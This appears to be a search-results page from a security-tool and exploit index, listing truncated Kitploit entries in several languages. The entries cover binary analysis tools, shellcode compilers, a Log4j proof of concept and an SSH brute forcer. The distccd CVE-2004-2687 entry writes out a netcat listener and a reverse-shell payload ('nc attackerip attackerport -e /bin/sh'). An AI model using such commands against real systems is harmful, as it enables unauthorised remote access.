Lucene search
+L

3850 matches found

Kitploit
Kitploit
added 2026/09/04 8:20 a.m.4 views

PS2EXE

AI free repository - 人工智能正在扼杀创造力和我们的天性! PS2EXE 对Ingo Karstein的出色脚本的增强,增加了GUI支持。GUI输出和输入通过一个开关激活,生成真正的Windows可执行文件。仅编译Powershell 5.x兼容脚本。带有可选的图形前端Win-PS2EXE。 模块版本。 您可以在以下位置找到基于脚本的版本:https://github.com/MScholtes/TechNet-Gallery 作者:Markus Scholtes 版本:1.0.18 日期:2026-06-06 安装 root@kitploit: PS C:...

6AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/04 7:42 a.m.6 views

zirgen

Compilador de Circuitos Zirgen Zirgen es un compilador para un lenguaje específico de dominio, también llamado "zirgen", que crea circuitos aritméticos para el sistema de pruebas RISC Zero. En su mayor parte, los usuarios de RISC Zero deberían escribir sus zkApps en Rust y usar nuestra zkVM RISC-...

6AI score
SaveExploits0References5
Kitploit
Kitploit
added 2026/09/04 7:29 a.m.5 views

WebSafeCompiler

WebSafeCompiler WSC WebSafeCompiler WSC es una utilidad avanzada compilador de sitios web diseñada para la optimización, minificación y ofuscación si la necesitas de aplicaciones web y sitios web mediante Node.js. Mejora tus activos web al reducir el tamaño de los archivos o proporcionar una...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/04 6:40 a.m.4 views

ARTist

ARTist - El kit de herramientas de instrumentación y seguridad para el Android Runtime ARTist es un marco de instrumentación flexible de código abierto para aplicaciones Android y middleware Java. Está basado en el compilador del Android Runtime ART y modifica el código durante la compilación en ...

5.9AI score
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/04 5:22 a.m.6 views

device-modeling-language

Device Modeling Language The Device Modeling Language DML is a domain-specific language for writing fast functional or transaction-level device models for virtual platforms. DML provides high-level abstractions suitable for functional device models, including constructs like register banks,...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/04 4:33 a.m.66 views

pharos

Pharos Static Binary Analysis Framework The Pharos static binary analysis framework is a project of the Software Engineering Institute at Carnegie Mellon University. The framework is designed to facilitate the automated analysis of binary programs. It uses the ROSE compiler infrastructure develop...

5.7AI score
SaveExploits0References3
Kitploit
Kitploit
added 2026/09/04 4:33 a.m.6 views

pharos

Pharos 静态二进制分析框架 Pharos 静态二进制分析框架是卡内基梅隆大学软件工程研究所的一个项目。该框架旨在促进二进制程序的自动化分析。它使用劳伦斯利弗莫尔国家实验室开发的 ROSE 编译器基础设施进行反汇编、控制流分析、指令语义等。本软件根据 BSD 许可协议 发布。 当前版本是对先前版本的重大更新,增加了多种功能,包括对 OOAnalyzer 工具的改进、实验性路径分析代码、分区器改进、多线程以及许多其他较小的功能。 Pharos...

5.9AI score
SaveExploits0References11
Kitploit
Kitploit
added 2026/09/04 4:24 a.m.294 views

retdec

Warning The RetDec project is currently in a limited maintenance mode due to a lack of resources: Pull Requests are welcomed. They are reviewed with priority, if possible without delays. Issues are reacted on with delays up to one quarter. Issues are not actively solved unless they relate to a...

5.8AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/04 4:10 a.m.33 views

bst

Binary String Toolkit Summary The Binary String Toolkit or BST for short is a rather simple utility to convert binary strings to various formats suitable for inclusions in source codes, such as those used to develop exploits and Proof of Concepts in the security field. Features Convert and dump...

5.4AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/04 2:03 a.m.3 views

ShellcodeCompiler

Shellcode 编译器 Shellcode 编译器是一个程序,可将 C/C++ 风格代码编译成针对 Windows(x86 和 x64)和 Linux(x86 和 x64)的小型、位置无关且不含 NULL 字节的 shellcode。它允许以用户友好的方式调用任何 Windows API 函数或 Linux 系统调用。 Shellcode 编译器接收一个源文件作为输入,并使用自己的编译器解释代码并生成汇编文件,然后使用 Keystone 引擎进行汇编。 命令行选项 root@kitploit: -h --help : 显示此帮助信息 -p --platform : Shellcode...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/04 1:53 a.m.4 views

CVE-2021-44228

CVE-2021-44228-POC Otro POC de CVE-2021-44228 Versiones de Log4j afectadas: desde 2.0-beta9 hasta 2.14.1 Prerrequisitos Java utilizado: OpenJDK 11 https://jdk.java.net/archive/ Maven necesario para compilar las aplicaciones en este repositorio alternativamente, descargue los archivos jar preparad...

10CVSS6.9AI score0.99999EPSS
SaveExploits367
Kitploit
Kitploit
added 2026/09/04 1:27 a.m.41 views

memoro

Memoro Memoro is a highly detailed heap profiler. Memoro not only shows you where and when your program makes heap allocations, but will show you how your program actually used that memory. Memoro collects detailed information on accesses to the heap, including reads and writes to memory and when...

5.9AI score
SaveExploits0References6
Kitploit
Kitploit
added 2026/09/04 12:59 a.m.4 views

APKiD

APKiD APKiD 能告诉你一个 APK 是如何构建的。它可以识别多种编译器、加壳器、混淆器以及其他奇奇怪怪的东西。它是 Android 版的 PEiD。 关于此工具的更多用途,请参考: Android 编译器指纹识别 使用 APKiD 检测盗版和恶意 Android 应用 APKiD:Android 应用的 PEiD(BlackHat EU/UK Arsenal 2018) APKiD:快速识别应用加固产品 APKiD:快速识别移动 RASP SDK(BlackHat USA Arsenal 2023) 安装 root@kitploit: pip install apkid...

5.8AI score
SaveExploits0References7
Kitploit
Kitploit
added 2026/09/04 12:32 a.m.5 views

distccd_rce_CVE-2004-2687

El objetivo de este script no es usar Metasploit, sino hacerlo manualmente. Uso: root@kitploit: nc -lvnp 4466 Ejecutando el exploit: root@kitploit: python3 ./exploit.py -t targetip -p targetport -c "nc attackerip attackerport -e /bin/sh"...

9.3CVSS7.2AI score0.88195EPSS
SaveExploits9
Kitploit
Kitploit
added 2026/09/04 12:22 a.m.5 views

solidity_CVE-2021-42574-POC

solidityCVE-2021-42574-POC 31 ene 2023, Altin tin-z, github.com/tin-z PoC POC de CVE-2021-42574 para solidity y el compilador solc. instalar root@kitploit: solc and select 0.8.17 version https://github.com/crytic/solc-select foundry https://github.com/foundry-rs/foundry desplegar contrato...

8.3CVSS6.9AI score0.12881EPSS
SaveExploits4
Kitploit
Kitploit
added 2026/09/03 11:11 p.m.3 views

DirDar

DirDar v1.0 描述 🏴‍☠️ 绕过禁止访问的目录 - 发现并识别目录列表 - 你也可以将其用作目录暴力破解工具 兼容性 只要您安装了 Go 编译器,此工具即可兼容所有类型的操作系统 安装 如果您已安装并配置了 Go,可以使用以下命令: root@kitploit: go get -u github.com/m4dm0e/dirdar 或者您可以下载一个发布版本。 为了更方便地执行,您可以将二进制文件所在的目录添加到您的环境变量 %PATH% 中。 在 Twitter 上分享! 工具截图: Linux Windows 帮助与标志 root@kitploit: -threads int...

5.9AI score
SaveExploits0References3
Kitploit
Kitploit
added 2026/09/03 11:05 p.m.6 views

cargo-fuzz

cargo fuzz ¡Un subcomando decargo para hacer fuzzing con libFuzzer! ¡Fácil de usar! Instalación root@kitploit: $ cargo install cargo-fuzz Nota: libFuzzer necesita soporte de sanitizers de LLVM, por lo que esto solo funciona en x86-64 y Aarch64, y solo en sistemas operativos tipo Unix no Windows...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/03 10:44 p.m.7 views

themida-unmutate

themida-unmutate A Python 3 tool to statically deobfuscate functions protected by Themida, WinLicense and Code Virtualizer 3.x's mutation-based obfuscation. The tool has been tested on Themida up to version 3.1.9. It's expected to work on WinLicense and Code Virtualizer as well. A Binary Ninja...

5.8AI score
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/03 8:53 p.m.36 views

cbrutekrag

cbrutekrag Penetration tests on SSH servers using dictionary attacks. Written in C. brute krag means "brute force" in afrikáans Disclaimer This tool is for ethical testing purpose only. cbrutekrag and its owners can't be held responsible for misuse by users. Users have to act as permitted by loca...

5.9AI score
SaveExploits0References5
Kitploit
Kitploit
added 2026/09/03 7:58 p.m.6 views

venom

VENOM 1.0.17 - metasploit Shellcode 生成器/编译器 root@kitploit: 版本发布 : v1.0.17 作者 : pedro ubuntu r00t-3xp10it 代号: 乌头 Aconitum napellus 支持发行版 : Linux Ubuntu, Kali, Mint, Parrot OS Suspicious-Shell-Activity SSA RedTeam 开发 @2019...

5.9AI score
SaveExploits0References1
Rows per page
Query Builder